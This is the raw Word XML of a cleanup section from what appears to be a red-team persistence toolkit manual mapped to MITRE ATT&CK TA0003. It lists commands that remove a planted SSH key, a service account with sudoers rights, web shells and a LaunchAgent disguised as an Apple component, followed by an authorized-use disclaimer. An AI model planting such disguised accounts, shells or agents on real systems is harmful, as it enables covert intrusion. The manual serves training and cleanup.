        </w:rPr>
        <w:t xml:space="preserve"># SSH key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i '/PersistenceToolkitDemo/d' ~/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Local account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">userdel -r svc_netcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -f /etc/sudoers.d/svc_netcompat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Web shells</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">find /var/www /srv/www -name 'system_check.*' -delete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># macOS LaunchAgent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">launchctl unload ~/Library/LaunchAgents/com.apple.sysnetcompat.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rm ~/Library/LaunchAgents/com.apple.sysnetcompat.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="C62828" w:sz="12" w:space="10"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="F5F7FA" w:val="clear"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C62828"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Always run the built-in Cleanup menu (option 9) after training sessions. The automated cleanup removes all toolkit artifacts in the correct order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C62828" w:sz="1"/>
          <w:left w:val="single" w:color="C62828" w:sz="12"/>
          <w:bottom w:val="single" w:color="C62828" w:sz="1"/>
          <w:right w:val="single" w:color="C62828" w:sz="1"/>
        </w:pBdr>
        <w:shd w:fill="FFF3F3" w:val="clear"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C62828"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This tool is for authorized testing and educational use only. All techniques generate real OS artifacts and network traffic that are logged and detectable. Only deploy in isolated lab environments or on systems you own or have explicit written authorization to test.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D8DC" w:sz="2" w:space="4"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C62828"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">AUTHORIZED TESTING AND EDUCATIONAL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D8DC" w:sz="2" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="546E7A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">MITRE ATT&amp;CK Persistence Toolkit  ·  TA0003  ·  Setup &amp; Operations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20" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0D1B2A"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1565C0"/>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2026-03-09T12:55:06.281Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-09T12:55:06.282Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>